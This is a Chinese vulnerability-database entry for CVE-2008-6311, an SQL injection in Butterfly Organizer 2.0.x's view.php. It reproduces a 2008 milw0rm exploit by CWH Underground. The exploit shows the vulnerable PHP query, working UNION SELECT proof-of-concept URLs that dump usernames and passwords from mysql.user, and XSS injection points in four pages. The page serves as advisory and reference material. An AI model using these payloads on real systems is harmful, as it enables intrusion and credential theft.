Butterfly Organizer 'view.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115422 漏洞类型 SQL注入
发布时间 2008-06-13 更新时间 2009-02-27
CVE编号 CVE-2008-6311 CNNVD-ID CNNVD-200902-628
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5797
https://www.securityfocus.com/bid/80774
https://cxsecurity.com/issue/WLB-2009030082
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-628
|漏洞详情
ButterflyOrganizer是一个基于PHP/MySQL的的网络用户管理解决方案。ButterflyOrganizer2.0.1版本的view.php中存在SQL注入漏洞。远程攻击者可以借助mytable参数,执行任意SQL指令。注意:id向量被其他CVE命名所覆盖。
|漏洞EXP
======================================================================
 Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
======================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE : 13 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : Butterfly Organizer
VERSION     : 2.0.0
DOWNLOAD    : www.butterflymedia.ro/downloads/organizer_2_0_0.zip
#####################################################

+++ Remote SQL Injection Exploit +++

----------------------------
 Vulnerable Code [view.php]
----------------------------
@Line

   26: $mytable = $_GET['mytable'];
   27: $id = $_GET['id'];
   28:
   29: $result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database);
   30: $myrow = mysql_fetch_array($result);


----------
 Exploit
----------
[+] http://[Target]/[Organizer_Path]/view.php?id=<SQL INJECTION>&mytable=test_category


-------------
 POC Exploit
-------------
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/mysql.user&mytable=test_category
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(username,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/test_category&mytable=test_category



+++ Remote XSS Exploit +++


-----------
 Exploits
-----------
[+] http://[Target]/[Organizer_Path]/view.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/viewdb2.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/category-rename.php?tablehere=<XSS>
[+] http://[Target]/[Organizer_Path]/module-contacts.php?letter=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-13]
|受影响的产品
Butterflymedia Butterfly Organizer 2.0.1
|参考资料

来源:XF
名称:butterfly-mytable-sql-injection(49012)
链接:http://xforce.iss.net/xforce/xfdb/49012
来源:MILW0RM
名称:7411
链接:http://www.milw0rm.com/exploits/7411
来源:SECUNIA
名称:33086
链接:http://secunia.com/advisories/33086